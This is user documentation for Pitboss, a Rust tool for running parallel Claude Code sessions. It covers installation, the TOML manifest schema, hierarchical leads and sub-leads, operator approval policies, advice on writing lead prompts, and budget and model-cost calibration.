Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

Pitboss

Pitboss is a Rust toolkit for running and observing parallel Claude Code sessions. A dispatcher (pitboss) fans out claude subprocesses under a concurrency cap, captures structured artifacts per run, and — in hierarchical mode — lets a lead dynamically spawn more workers via MCP. The TUI (pitboss-tui) gives the floor view: tile grid, live log tailing, budget and token counters.

Language models are stochastic. A well-run pit is not.

What pitboss does

PrimitiveDescription
Flat dispatchDeclare N tasks up front; pitboss runs them in parallel under a concurrency cap. Each task runs in its own git worktree on its own branch.
Hierarchical dispatchDeclare one lead; the lead observes the situation and dynamically spawns workers via MCP tools, under budget and worker-cap guardrails you set.
Depth-2 sub-leads(v0.6+) A root lead may spawn sub-leads, each with its own envelope and isolated coordination layer. Useful for multi-phase projects that each need their own context.
Operator controlCancel, pause, freeze, or reprompt workers live. Gate actions on operator approval. The TUI shows everything in real time.
Structured artifactsEvery run produces per-task logs, token usage, session ids, and a summary.json. Nothing disappears when the terminal closes.

Quick orientation

Current version

v0.7.0 — headless-mode hardening. Bundled-claude container variant (ghcr.io/sds-mode/pitboss-with-claude), CLAUDE_CODE_ENTRYPOINT=sdk-ts permission default (closes the “silent 7-second success” sub-lead failure), ApprovalRejected/ApprovalTimedOut terminal states, spawn_sublead gains optional env + tools parameters, dispatch-time TTY warning when approval gates are configured without an operator surface, pitboss agents-md subcommand + /usr/share/doc/pitboss/AGENTS.md in container images, native multi-arch CI (62 min → 5 min), GHA action bumps for Node 24 compatibility.

See Changelog for the full version history.

Install

Pitboss ships two binaries: pitboss (the CLI dispatcher) and pitboss-tui (the terminal UI). Install both, or just pitboss if you don’t need the live floor view.

Releases are built with cargo-dist and include curl | sh installers. Each installer detects your platform, downloads the matching tarball, verifies its SHA-256, and drops the binary into ~/.cargo/bin.

curl -LsSf https://github.com/SDS-Mode/pitboss/releases/latest/download/pitboss-cli-installer.sh | sh
curl -LsSf https://github.com/SDS-Mode/pitboss/releases/latest/download/pitboss-tui-installer.sh | sh

pitboss version
pitboss-tui --version

Supported targets: x86_64-unknown-linux-gnu, aarch64-unknown-linux-gnu, aarch64-apple-darwin.

Via Homebrew

brew install SDS-Mode/pitboss/pitboss-cli
brew install SDS-Mode/pitboss/pitboss-tui

Formulae are auto-published to the SDS-Mode/homebrew-pitboss tap on every release.

Via container image

Published to GitHub Container Registry on every push to main and every release tag (linux/amd64 + linux/arm64):

podman pull ghcr.io/sds-mode/pitboss:latest

# Validate a manifest inside the container
podman run --rm -v $(pwd)/pitboss.toml:/run/pitboss.toml \
    ghcr.io/sds-mode/pitboss:latest \
    pitboss validate /run/pitboss.toml

Note: The image includes git (needed for worktree isolation) but does not include the claude binary. Mount your host’s Claude Code install or build a derived image that layers it in.

Direct tarball download

curl -L https://github.com/SDS-Mode/pitboss/releases/latest/download/pitboss-cli-x86_64-unknown-linux-gnu.tar.xz \
  | tar xJ -C ~/.local/bin

Tarballs and SHA-256 checksums are attached to every GitHub release.

From source

git clone https://github.com/SDS-Mode/pitboss.git
cd pitboss
cargo install --path crates/pitboss-cli
cargo install --path crates/pitboss-tui

Shell completions

Both binaries emit completion scripts:

# bash
pitboss completions bash     > ~/.local/share/bash-completion/completions/pitboss
pitboss-tui completions bash > ~/.local/share/bash-completion/completions/pitboss-tui

# zsh (adjust for your $fpath)
pitboss completions zsh      > ~/.zsh/completions/_pitboss
pitboss-tui completions zsh  > ~/.zsh/completions/_pitboss-tui

Fish, elvish, and powershell are also supported.

Prerequisites

  • claude CLI — pitboss is a dispatcher on top of Claude Code. Install it from claude.ai/code and authenticate normally. No ANTHROPIC_API_KEY required on Claude Code login systems.
  • Git — required for worktree isolation (the default). Every task runs in its own git worktree on its own branch. Set use_worktree = false to skip this for read-only analysis runs.

Next step

Your first dispatch (flat mode)

Your first dispatch (flat mode)

Flat mode is the simplest way to use pitboss. You declare N tasks in a TOML manifest; pitboss fans them out in parallel, each in its own git worktree, and collects the results.

Write a manifest

Create pitboss.toml:

[run]
max_parallel = 2

[[task]]
id = "hello-a"
directory = "/path/to/your/repo"
prompt = "Write 'Hello from worker A' to a file called hello-a.txt at the repo root."
branch = "feat/hello-a"

[[task]]
id = "hello-b"
directory = "/path/to/your/repo"
prompt = "Write 'Hello from worker B' to a file called hello-b.txt at the repo root."
branch = "feat/hello-b"

Replace /path/to/your/repo with any git repository on your machine. The branch fields name the worktree branches pitboss will create. If you omit branch, pitboss auto-generates a name.

Validate first

Always validate before dispatching. This catches schema errors, missing directories, and semantic issues without spawning any claude processes:

pitboss validate pitboss.toml

Exit code 0 means the manifest is valid. Non-zero prints the error and exits.

Dispatch

pitboss dispatch pitboss.toml

Pitboss fans out both tasks in parallel (up to max_parallel = 2), streams progress to your terminal, and blocks until all tasks finish.

Exit codes:

  • 0 — all tasks succeeded
  • 1 — one or more tasks failed (pitboss itself ran cleanly)
  • 2 — manifest error, missing claude binary, etc.
  • 130 — interrupted (Ctrl-C; tasks drained gracefully)

Read the run artifacts

After dispatch, find the run directory:

RUN_DIR=$(ls -td ~/.local/share/pitboss/runs/*/ | head -1)
echo $RUN_DIR

The run directory contains:

FileContents
manifest.snapshot.tomlExact manifest bytes used for this run
resolved.jsonFully resolved manifest (defaults applied)
meta.jsonrun_id, started_at, claude_version, pitboss_version
summary.jsonFull structured summary written on clean finalize
summary.jsonlAppended incrementally as tasks finish
tasks/<id>/stdout.logRaw stream-JSON from the task’s claude subprocess
tasks/<id>/stderr.logStderr output

Inspect the summary:

cat "$RUN_DIR/summary.json" | jq '.tasks[] | {id: .task_id, status: .status, tokens: .token_usage}'

Watch the floor (optional)

Start pitboss-tui in another terminal while dispatch is running:

pitboss-tui

The TUI opens the most recent run automatically. Press ? for keybindings. Press Enter on a tile to open the Detail view with live log tailing. Press q to quit.

Attach to a single worker

pitboss attach <run-id> hello-a

Follow-mode log viewer for a single task. Run-id is resolved by prefix (first 8 chars of the UUID are enough when unique). Exits on Ctrl-C or when the worker finishes.

Key manifest knobs for flat mode

FieldDefaultNotes
[run].max_parallel4How many tasks run concurrently
[run].halt_on_failurefalseStop remaining tasks if any task fails
[run].worktree_cleanup"on_success""always", "on_success", "never"
[[task]].use_worktreetrueSet false for read-only analysis (no branch needed)
[[task]].timeout_secsnonePer-task wall-clock cap
[[task]].modelsee [defaults]Per-task model override

See Manifest schema for the full field reference.

Next step

Hierarchical dispatch with a lead

Hierarchical dispatch with a lead

Hierarchical mode hands a lead — a Claude session with MCP orchestration tools — a prompt and a set of guardrails, then lets it decide how many workers to spawn and in what order.

Use hierarchical mode when you’re describing a policy (“one worker per file in this directory”, “one worker per unique author”) rather than a fixed list of tasks.

A minimal hierarchical manifest

[run]
max_workers = 4
budget_usd = 2.00
lead_timeout_secs = 900

[defaults]
model = "claude-haiku-4-5"
use_worktree = false

[[lead]]
id = "digest"
directory = "/path/to/your/repo"
prompt = """
List the last 10 commits with:
    git log --format='%H %an %s' -10

Group commits by author. For each unique author, spawn one worker via
mcp__pitboss__spawn_worker with a prompt to summarize that author's commits
in a file at /tmp/digest/<author-slug>.md.

Wait for all workers via mcp__pitboss__wait_for_worker.

Read each output file and write a combined /tmp/digest/SUMMARY.md.

Then exit.
"""

House rules

The three fields under [run] are the house rules — guardrails the lead must stay within:

FieldRequiredMeaning
max_workersyesHard cap on concurrent + queued workers (1–16).
budget_usdyesTotal spend envelope. Each spawn reserves a model-aware estimate; spawn_worker returns budget exceeded once the estimate would push over the cap.
lead_timeout_secsnoWall-clock cap on the lead itself. Defaults to 3600s. Set generously for multi-phase plans.

Validate and dispatch

pitboss validate pitboss.toml   # prints a hierarchical summary when [[lead]] is set
pitboss dispatch pitboss.toml

What the lead can do

The lead’s --allowedTools is automatically populated with the full pitboss MCP toolset. The lead does not need to list them. Key tools:

ToolWhat it does
mcp__pitboss__spawn_workerSpawn a worker with a prompt, optional directory/model/tools
mcp__pitboss__wait_for_workerBlock until a specific worker finishes
mcp__pitboss__wait_for_anyBlock until the first of a list of workers finishes
mcp__pitboss__list_workersSnapshot of all active and completed workers
mcp__pitboss__cancel_workerCancel a running worker
mcp__pitboss__pause_workerPause a worker (cancel-with-resume or SIGSTOP freeze)
mcp__pitboss__continue_workerResume a paused or frozen worker
mcp__pitboss__reprompt_workerMid-flight redirect with a new prompt
mcp__pitboss__request_approvalGate an action on operator approval
mcp__pitboss__propose_planSubmit a pre-flight plan for operator approval

Workers also get the 7 shared-store tools (kv_get, kv_set, kv_cas, kv_list, kv_wait, lease_acquire, lease_release) for cross-worker coordination. See Coordination & state.

In the TUI

Lead tiles render with a glyph and a cyan border. Workers spawned by the lead show a glyph and display ← <lead-id> on their bottom border. The status bar counts N workers spawned.

Depth-2 sub-leads (v0.6+)

If the job decomposes into orthogonal phases that each need their own clean context, a root lead can spawn sub-leads — each with its own budget envelope and coordination layer. Add allow_subleads = true to the [[lead]] block and use spawn_sublead instead of spawn_worker for the phase coordinators.

See Depth-2 sub-leads for the full model.

Resuming a hierarchical run

pitboss resume <run-id>

Re-dispatches the lead with --resume <session-id>. Workers are not individually resumed — the lead decides whether to spawn fresh workers. If the original run used worktree_cleanup = "on_success" (the default), set worktree_cleanup = "never" on runs you know you’ll want to resume.

Next steps

Manifest schema

Pitboss manifests are TOML files, typically named pitboss.toml. A manifest is either flat (one or more [[task]] entries) or hierarchical (exactly one [[lead]] entry). The two are mutually exclusive.

Always validate before dispatching:

pitboss validate pitboss.toml

[run] — run-wide configuration

KeyTypeRequired?DefaultNotes
max_parallelintno4Flat mode: concurrency cap. Overridden by ANTHROPIC_MAX_CONCURRENT env.
halt_on_failureboolnofalseFlat mode: stop remaining tasks on first failure.
run_dirstring pathno~/.local/share/pitboss/runsWhere per-run artifacts land.
worktree_cleanup"always" | "on_success" | "never"no"on_success"What to do with each worker’s worktree after completion. Use "never" for inspection-heavy runs or when you plan to resume.
emit_event_streamboolnofalseEmit a JSONL event stream (pause/cancel/approval events) alongside summary.jsonl.
max_workersintif [[lead]] presentunsetHierarchical: hard cap on concurrent + queued workers (1–16).
budget_usdfloatif [[lead]] presentunsetHierarchical: soft cap with reservation accounting. spawn_worker fails with budget exceeded once spent + reserved + next_estimate > budget.
lead_timeout_secsintno3600Hierarchical: wall-clock cap on the lead. Set generously for multi-hour plans (e.g., 21600 for a 6-hour plan executor).
approval_policy"block" | "auto_approve" | "auto_reject"no"block"Hierarchical: how request_approval / propose_plan behave when no TUI is attached.
require_plan_approvalboolnofalseHierarchical (v0.5.0+): when true, spawn_worker refuses until a propose_plan call has been approved.
dump_shared_storeboolnofalseHierarchical: write shared-store.json into the run directory on finalize.

[defaults] — task/lead defaults

Inherited by every [[task]] and [[lead]] unless overridden at the task level.

KeyTypeNotes
modelstringe.g., claude-haiku-4-5, claude-sonnet-4-6, claude-opus-4-7. Dated suffixes allowed.
effort"low" | "medium" | "high"Maps to claude --effort.
toolsarray of string--allowedTools value. Pitboss auto-appends its MCP tools for leads and workers. Default: ["Read", "Write", "Edit", "Bash", "Glob", "Grep"]. See Security → Defense-in-depth → Read-only lead pattern for guidance on restricting this per worker.
timeout_secsintPer-task wall-clock cap. No default (no cap).
use_worktreeboolDefault true. Set false for read-only analysis runs.
envtableEnv vars passed to the claude subprocess.

[[task]] — flat mode (repeat for each task)

KeyRequired?Notes
idyesShort slug. Alphanumeric + _ + -. Unique within manifest. Used in logs, worktree names.
directoryyesMust be inside a git repo if use_worktree = true.
promptyesSent to the claude subprocess via -p.
branchnoWorktree branch name. Auto-generated if omitted.
model, effort, tools, timeout_secs, use_worktree, envnoPer-task overrides of [defaults].

[[lead]] — hierarchical mode (exactly one)

Same fields as [[task]]. The lead is a single Claude session that receives the MCP orchestration toolset. Mutually exclusive with [[task]].

Additional fields on [[lead]] for depth-2 sub-leads (v0.6+):

KeyTypeNotes
allow_subleadsboolDefault false. Set true to expose spawn_sublead to the root lead.
max_subleadsintOptional cap on total sub-leads spawned.
max_sublead_budget_usdfloatOptional cap on the per-sub-lead budget_usd envelope.
max_workers_across_treeintOptional cap on total live workers across all sub-trees.

[lead.sublead_defaults]

Optional defaults for sub-leads spawned via spawn_sublead. Any field omitted in the spawn_sublead call falls back to these values.

KeyType
budget_usdfloat
max_workersint
lead_timeout_secsint
read_downbool

[[approval_policy]] — declarative approval rules (v0.6+)

Zero or more policy blocks, evaluated in order. First matching rule wins.

[[approval_policy]]
match = { actor = "root→S1", category = "tool_use" }
action = "auto_approve"

[[approval_policy]]
match = { category = "plan" }
action = "block"

Match fields (all optional; unset fields always match):

FieldTypeNotes
actorstringActor path, e.g., "root→S1" or "root→S1→W3".
categorystring"tool_use", "plan", "cost", etc.
tool_namestringSpecific MCP tool name.
cost_overfloatFires when the request’s cost_estimate exceeds this value (USD).

Actions: "auto_approve", "auto_reject", "block" (forces operator review).

Rules are evaluated in pure Rust — deterministic, fast, never LLM-evaluated.


Annotated example

The pitboss.example.toml in the repository root has every field annotated with usage notes. It is a good starting point for new manifests.


Run artifacts

After dispatch, the run directory (~/.local/share/pitboss/runs/<run-id>/) contains:

FileContents
manifest.snapshot.tomlExact manifest bytes used
resolved.jsonFully resolved manifest (defaults applied)
meta.jsonrun_id, started_at, claude_version, pitboss_version
summary.jsonFull structured summary (written on clean finalize)
summary.jsonlIncremental task records as they finish
tasks/<id>/stdout.logRaw stream-JSON from the task’s subprocess
tasks/<id>/stderr.logStderr
lead-mcp-config.jsonHierarchical only: the --mcp-config pointing at the MCP bridge
shared-store.jsonHierarchical only: written when dump_shared_store = true

Flat vs. hierarchical mode

Pitboss has two dispatch modes. Choosing the right one before writing a manifest saves significant rework.

Decision table

QuestionAnswer → Mode
Can you enumerate every task before running?Flat
Does the decomposition depend on what you find at runtime?Hierarchical
Do you need budget enforcement?Hierarchical
Is the work purely parallel with no coordination?Flat
Does the lead need to observe partial results and decide next steps?Hierarchical
Do sub-tasks need a shared coordination surface (KV store, leases)?Hierarchical

Side-by-side comparison

FlatHierarchical
Tasks declaredStatically, in the manifestDynamically, by the lead at runtime
Number of workersFixed (N [[task]] entries)Dynamic, bounded by max_workers
Budget enforcementNoneYes, via budget_usd + reservation accounting
MCP serverNot startedYes, unix socket; auto-bridged to lead
Cross-worker stateNoneShared KV store + leases
Operator approvalsNot availableAvailable via request_approval / propose_plan
Lead can be paused/redirectedN/AYes, via TUI or MCP tools
Resume semanticsEach task resumes individuallyOnly the lead resumes; lead re-decides worker strategy

When to use flat mode

  • You can write out every [[task]] before running.
  • The tasks are independent — each one doesn’t need the output of another.
  • You want the simplest possible setup with no MCP overhead.
  • You’re running read-only analysis where every target is known up front.
[run]
max_parallel = 3

[defaults]
model = "claude-haiku-4-5"
use_worktree = false

[[task]]
id = "summarize-a"
directory = "/path/to/repo"
prompt = "Summarize file-a.txt into one sentence. Write to /tmp/summaries/a.md."

[[task]]
id = "summarize-b"
directory = "/path/to/repo"
prompt = "Summarize file-b.txt into one sentence. Write to /tmp/summaries/b.md."

When to use hierarchical mode

  • You’re describing a policy: “one worker per file in this directory”, “one worker per unique author”.
  • The decomposition depends on what the lead finds when it starts running.
  • You want a budget cap to protect against runaway spending.
  • You want the lead to observe partial results and make decisions (e.g., spawn more workers if initial results look incomplete, or skip remaining work after a budget hit).
[run]
max_workers = 6
budget_usd = 1.50
lead_timeout_secs = 1200

[defaults]
model = "claude-haiku-4-5"
use_worktree = false

[[lead]]
id = "author-digest"
directory = "/path/to/repo"
prompt = """
List the last 20 commits with `git log --format='%H %an %s' -20`. Group by author.
Spawn one worker per unique author via mcp__pitboss__spawn_worker to summarize
that author's work in /tmp/digest/<author-slug>.md. Wait for all, then compose
/tmp/digest/SUMMARY.md.
"""

Rule of thumb

If the operator can write out every [[task]] before running, use flat. If the operator is describing a policy, use hierarchical.

When to use depth-2 sub-leads

Depth-2 sub-leads (v0.6+) add a third tier: a root lead may spawn sub-leads, each running their own workers with their own envelope and isolated coordination layer.

Use sub-leads when:

  • The project decomposes into orthogonal phases that each need their own clean Claude context.
  • Different phases have meaningfully different budget requirements.
  • You want to prevent one phase from observing another’s intermediate state.

Do not use sub-leads for every multi-worker job. Plain workers are cheaper to coordinate; sub-leads add MCP round-trips and context switching overhead. Add sub-leads only when the context isolation benefit is worth it.

See Depth-2 sub-leads for the full model.

Depth-2 sub-leads

Added in v0.6.0.

Pitboss normally allows a single level of nesting: a root lead spawning workers. Depth-2 sub-leads add one more tier — a root lead may spawn sub-leads, each of which spawns workers. Workers remain terminal: they cannot spawn anything.

When to use sub-leads

Use sub-leads when the root lead’s plan decomposes into orthogonal phases that each need their own clean Claude context. For example:

  • Phase 1 gathers inputs; Phase 2 processes them — they don’t share implementation state, so keeping them in separate contexts avoids prompt pollution.
  • Different phases have meaningfully different budget requirements.
  • You want to prevent one phase from reading another’s intermediate work (strict-tree isolation is the default).

Do not use sub-leads for every multi-worker job. Plain workers are cheaper and simpler. Add sub-leads only when context isolation is worth the overhead.

Manifest

Enable sub-leads by setting allow_subleads = true on the [[lead]] block:

[run]
max_workers = 20
budget_usd = 20.00
lead_timeout_secs = 7200

[[lead]]
id = "root"
allow_subleads = true
max_subleads = 4
max_sublead_budget_usd = 5.00
max_workers_across_tree = 16
directory = "/path/to/repo"
prompt = """
Decompose this project into phases. For each phase, spawn a sub-lead with
its own budget and a focused prompt via spawn_sublead. Wait for all sub-leads
via wait_actor. Synthesize the results.
"""

[lead.sublead_defaults]
budget_usd = 2.00
max_workers = 4
lead_timeout_secs = 1800
read_down = false

[[lead]] fields for sub-leads

FieldDefaultNotes
allow_subleadsfalseRequired to expose spawn_sublead to the root lead.
max_subleadsnoneOptional cap on total sub-leads spawned across the run.
max_sublead_budget_usdnoneCap on the per-sub-lead budget_usd envelope. Spawn attempts exceeding this fail fast before any state is mutated.
max_workers_across_treenoneCap on total live workers (root + all sub-trees).

[lead.sublead_defaults]

Optional defaults inherited by spawn_sublead calls that omit those parameters.

spawn_sublead MCP tool

Available only to the root lead when allow_subleads = true.

spawn_sublead(
  prompt: string,
  model: string,
  budget_usd: float,
  max_workers: u32,
  lead_timeout_secs?: u64,
  initial_ref?: { [key: string]: any },
  read_down?: bool,
)
→ { sublead_id: string }
  • initial_ref — optional key-value snapshot seeded into the sub-lead’s /ref/* namespace at spawn time. Use it to pass shared configuration (e.g., target file paths, conventions, task list) without requiring the sub-lead to make a separate kv_get call.
  • read_down — when true, the root lead can observe the sub-tree’s KV store. Default false (strict-tree isolation).

wait_actor MCP tool

wait_actor generalizes wait_for_worker to accept any actor id — worker or sub-lead:

wait_actor(actor_id: string, timeout_secs?: u64)
→ ActorTerminalRecord

wait_for_worker is retained as a back-compat alias and continues to work for worker ids.

Authorization model

AccessDefault behavior
Root reads into sub-treeBlocked. Pass read_down = true at spawn_sublead to allow.
Sub-lead reads into sibling sub-treeAlways blocked.
Peer visibility within a layerEach /peer/<X>/* is readable only by X itself, that layer’s lead, or the operator via TUI. Workers within a sub-tree do not see each other’s peer slots.
Operator (TUI)Super-user across all layers, regardless of read_down.

Approval routing

All approval requests — from any layer — route to the operator via the TUI approval list pane. The root lead is not an approval authority. Use [[approval_policy]] rules to auto-approve routine requests before they reach the operator queue.

See Approvals for the full policy model.

Kill-with-reason

cancel_worker(target, reason) — when invoked with a reason string, a synthetic [SYSTEM] reprompt is delivered to the killed actor’s direct parent lead. This lets the parent adapt without a separate reprompt_worker round-trip:

  • Kill a worker → its sub-lead (or root lead) receives the reason.
  • Kill a sub-lead → the root lead receives the reason.

Cancel cascade

When the operator cancels a run (via TUI X or Ctrl-C), cancellation propagates depth-first through the entire tree: root → each sub-lead → each sub-lead’s workers. No straggler processes are left running.

TUI presentation

In the TUI, sub-trees render as collapsible containers. The container header shows the sublead_id, a budget bar, worker count, approval badge, and read_down indicator. Tab cycles focus across containers; Enter on a header toggles expand/collapse.

Run-global leases for cross-tree coordination

Per-layer /leases/* KV namespaces are isolated per sub-tree. For resources that span sub-trees (e.g., a path on the operator’s filesystem), use the run-global lease API:

run_lease_acquire(key: string, ttl_secs: u32) → { lease_id, version }
run_lease_release(lease_id: string) → { ok: true }

See Leases & coordination for guidance on when to use /leases/* vs run_lease_*.

Writing effective leads

A lead prompt is the strategic layer of a hierarchical run: it tells Claude what to do as an orchestrator, not as a performer. Getting this right is the single highest-leverage thing you can do to improve run reliability. This page covers the patterns that make lead prompts work well, the anti-patterns that don’t, and ends with a complete annotated example you can adapt.


What a lead actually does

A lead is a Claude session that receives the orchestration MCP toolset — spawn_worker, wait_actor, request_approval, kv_set, and the rest. The prompt sets the strategy; the tools enact it. The important detail: Claude’s default behavior is to do work itself. Given a task and the ability to read files, Claude will read files. You have to actively counter this tendency and push it toward delegation — otherwise you’ll get a lead that solves the whole problem in-context and spawns nothing, which defeats the purpose of using hierarchical mode at all.


The decomposition framing

The opening of a lead prompt should explicitly state that the lead’s job is coordination, not execution. Left implicit, models default to monolithic execution — they complete the work themselves and never invoke spawn_worker.

What good decomposition framing contains:

  • An explicit non-execution instruction. “Your job is to coordinate. Do NOT do the work yourself.”
  • A concrete decomposition heuristic. The lead needs to know when to spawn. Vague instructions (“spawn workers as needed”) produce unpredictable behavior. Name the decomposition axis: “one worker per file”, “one worker per phase”, “one worker per unique dependency”.
  • Worker invocation parameters spelled out. Specify which model, budget, tools, and prompt template each worker should receive. Leaving these open-ended produces inconsistent workers.
  • An explicit wait instruction naming the tool. Don’t assume the lead knows to call wait_actor; say “after spawning all workers, call wait_actor on each one before proceeding.”
  • A summary instruction at the end. Without it, leads often end with conversational filler rather than a structured result.

Anti-pattern — too vague:

Audit the security headers for each URL in /tmp/urls.txt. Spawn workers as needed.

This prompt doesn’t tell the lead when to spawn, what the workers should do, or what to produce. Most models will just process the URLs themselves.

Better:

Your job is to COORDINATE, not to do the work yourself.
For each URL in /tmp/urls.txt, spawn exactly one worker via spawn_worker.
Workers should use model = "claude-sonnet-4-6", budget = 0.20.
After spawning all workers, call wait_actor on each worker_id before continuing.
When all workers have finished, produce a final report (see "Final report" below).

Worker prompt templates

The lead writes worker prompts at runtime. If you don’t teach it a template, it will improvise — and inconsistent worker prompts produce inconsistent worker outputs that are hard to aggregate.

Teach the lead a template in the lead prompt itself:

Spawn each worker using this exact prompt template (substitute [URL] and [WORKER_N]):

"You are WORKER_N. Fetch [URL] and check the following security headers:
Content-Security-Policy, X-Frame-Options, Strict-Transport-Security.
Produce a report with exactly three sections:
1. FOUND: headers that are present and their values
2. MISSING: headers that are absent
3. RECOMMENDATION: one sentence per missing header
Keep the report under 400 words. Do not include any other content."

Why templates matter: free-form worker prompts lead to workers that structure their output differently — some use prose, some use tables, some omit sections entirely. The lead then can’t reduce the results cleanly. A template enforces the shape of each worker’s output and makes the lead’s aggregation step deterministic.


Handling partial results

Workers fail. They time out, hit context limits, or return error messages. A lead without explicit instructions for this case will often stall, retry indefinitely, or crash.

Three patterns — pick one and name it in the prompt:

Fail-fast: Any worker failure cancels remaining work and reports aggregate failure. Use when work is sequential or when partial results are useless.

If any worker returns an error or times out, do NOT spawn additional workers.
Collect the errors and produce a final report listing which inputs failed and why.

Best-effort: Collect what completes, note what didn’t, exit cleanly. Use when work is independent (e.g., one worker per file — a failed file audit doesn’t affect the others).

If a worker returns an error, record the failure and continue with the remaining workers.
Do not retry failed workers. In the final report, list which inputs were successfully
processed and which were not, with the error reason for each failure.

Retry-on-failure: Respawn with a corrected prompt up to N times. Use when failures are typically transient (network, race conditions, intermittent tool errors).

If a worker returns an error, inspect the error. If it appears transient (network timeout,
tool unavailable), respawn that worker once with the same prompt. If it fails again,
treat it as a permanent failure and record it as such. Do not retry more than once per input.

Name the pattern explicitly in your prompt. Don’t rely on the lead to infer the right behavior from context.


Graceful budget exhaustion

Leads spawn workers that consume budget. When budget_usd runs low, spawn_worker returns a budget exceeded error. Without explicit handling instructions, leads either crash on this error or retry the spawn indefinitely — both bad outcomes.

The instruction to add:

You have a budget of $X for this run. Before each spawn_worker call, estimate whether
you have enough remaining budget to complete the current worker plus any workers you
still need to spawn. If you don't, stop spawning new workers immediately. Produce a
final report listing what was completed and what was deferred due to budget exhaustion.

The same pattern applies to the other resource limits:

  • max_workers cap: “If spawn_worker returns max_workers exceeded, wait for a running worker to complete before spawning the next one.”
  • lead_timeout_secs: “If you have fewer than 5 minutes remaining on your wall-clock limit, stop spawning and produce your final report with what has completed so far.”

Without these instructions, budget and concurrency caps become crash sites rather than graceful stopping points.


The summary instruction

A lead’s final assistant message becomes the final_message_preview field of the TaskRecord. This is what shows up in the TUI after the run, in notifications, and in summary.jsonl post-run inspection. Without an explicit instruction to produce a structured summary, leads often end with phrases like “Let me know if you need anything else” — which tells the operator nothing.

Instruct the lead explicitly:

When all workers have completed (or budget is exhausted), produce a final report
with the following sections in this order:

1. STATUS: one of "success", "partial", or "failed"
2. COMPLETED: one bullet per worker — worker ID, input, one-sentence result
3. DEFERRED OR FAILED: one bullet per unprocessed input — input and reason
4. COST SUMMARY: list of worker IDs and their approximate spend in USD

Do not include any text after the final report.

The structure matters: tools that parse final_message_preview (notification webhooks, downstream scripts) need a predictable format. Even if you’re just reading it yourself in the TUI, a consistent structure is much easier to scan.


A complete example

The following lead prompt audits HTTP security headers across a list of URLs. It incorporates all the patterns above: explicit non-execution framing, decomposition heuristic, worker template, best-effort failure handling, budget exhaustion guard, and a structured summary.

[[lead]]
id        = "security-audit"
model     = "claude-haiku-4-5"
directory = "/tmp/audit-workdir"
prompt    = """
Your job is to COORDINATE this security audit. Do NOT fetch any URLs or check
any headers yourself — that is the workers' job.

## Decomposition

Read /tmp/urls.txt. It contains one URL per line.
Spawn exactly one worker per URL via spawn_worker.

Worker parameters:
  model      = "claude-sonnet-4-6"
  budget_usd = 0.20
  tools      = ["WebFetch", "Read"]

Use this exact prompt template for each worker (substitute [URL] and [N]):
---
You are worker [N] auditing [URL].
Fetch the URL's HTTP response headers using WebFetch.
Check for these headers: Content-Security-Policy, X-Frame-Options,
Strict-Transport-Security, X-Content-Type-Options, Referrer-Policy.

Produce a report with exactly three sections:
FOUND: list each present header and its value (one per line)
MISSING: list each absent header (one per line)
RECOMMENDATION: one sentence per missing header explaining why it matters

Keep the report under 400 words. No other content.
---

## Waiting

After spawning all workers, call wait_actor on each worker_id before continuing.

## Failure handling

If a worker returns an error, record the failure and continue with remaining workers.
Do not retry. In the final report, list which URLs were not processed and why.

## Budget exhaustion

Before each spawn_worker call, check your remaining budget. If insufficient for
another worker, stop spawning and proceed to the final report, listing which URLs
were deferred.

## Final report

When all workers have completed or you have exhausted your budget, produce a report
with these sections in order:

1. STATUS: "success", "partial", or "failed"
2. COMPLETED: one bullet per processed URL — URL, finding summary (one sentence)
3. DEFERRED OR FAILED: one bullet per unprocessed URL — URL, reason
4. COST SUMMARY: worker IDs and approximate spend in USD

Do not include any text after the final report.
"""

Operators can adapt this template by swapping the decomposition axis (files instead of URLs, phases instead of inputs), adjusting the worker model and budget, and replacing the worker prompt template with task-specific instructions.


See also

Cost & model selection

budget_usd is a hard guardrail, but it only protects you after the fact. Good operators set it based on a prior estimate of what the run should cost — and pick models that match the reasoning demands of each role. This page covers how to calibrate both.

Pricing note: The figures in this page are approximate snapshots from early 2026. Anthropic’s pricing changes over time. Before committing to a budget for a production run, verify current rates at https://www.anthropic.com/pricing.


The two model pricing tiers (as of 2026)

ModelInput ($/MTok)Output ($/MTok)Best for
claude-haiku-4-5~$1~$5High-volume simple decisions, leads orchestrating small jobs, cheap first-pass triage
claude-sonnet-4-6~$3~$15Most general-purpose reasoning and code work; default for workers that need to think
claude-opus-4-7~$15~$75Deep reasoning on genuinely hard problems; rarely necessary for routine code or text

These are approximate figures. Verify at https://www.anthropic.com/pricing before calibrating production budgets.


Calibrating budget_usd from typical worker costs

Worker cost is driven by token volume — how many tokens the worker reads (input) and generates (output). The table below gives rough orders of magnitude for common task types. Measure your own workloads; these are starting points, not guarantees.

Task typeTypical token usageApprox cost — Haiku 4.5Approx cost — Sonnet 4.6
Small code review (one file, <500 LOC)5K–15K tokens$0.02–$0.08$0.06–$0.25
Medium audit (a few files + structured report)15K–50K tokens$0.08–$0.30$0.25–$1.00
Large refactor (many files, multi-turn)50K–200K tokens$0.30–$1.50$1–$5
Continuous test loop (with reprompts)100K–500K tokens$0.50–$3$2–$10

Reservation overhead

When you call spawn_worker, pitboss reserves the worker’s estimated_cost_usd against the run’s budget before the worker starts. On completion, the reservation is released and the actual spend is recorded. This prevents budget overruns but has a practical consequence: if your estimate is too low, spawn_worker fails (“budget exceeded”) before the worker has done anything. If too high, other workers can’t spawn until the first one finishes and releases its reservation.

Practical defaults:

  • Set estimated_cost_usd per worker at 1.5× your typical actual cost for that task type. The 50% margin accounts for variance in input size and response verbosity.
  • Set budget_usd at 1.2× the sum of all expected worker estimates. The 20% margin covers the lead’s own token use and any workers that run over their estimate.

Example for a run with 5 medium-audit workers (Sonnet 4.6, expected ~$0.50 each):

estimated_cost_usd per worker = $0.50 × 1.5 = $0.75
Sum of estimates = 5 × $0.75 = $3.75
budget_usd = $3.75 × 1.2 = $4.50

Cross-reference: Manifest schema → budget_usd for the full reservation accounting semantics.


The “Haiku-as-lead, Sonnet-as-worker” pattern

The most common cost-effective pattern for hierarchical runs:

  • The lead’s job is tool dispatch and simple decisions — which worker to spawn next, when to stop, how to aggregate results. This is not demanding reasoning. Haiku handles it well at roughly one-fifth the input cost of Sonnet.
  • Workers do the actual reasoning — reading code, writing reports, producing patches. Sonnet’s stronger tool use and reasoning quality is worth the cost premium at the task level.

A typical depth-1 run with 5 workers under this pattern:

  • Lead (Haiku, ~$0.05 total): reads the task list, spawns workers, waits, summarizes
  • 5 workers (Sonnet, ~$0.20 each = ~$1.00 total)
  • Total: ~$1.05

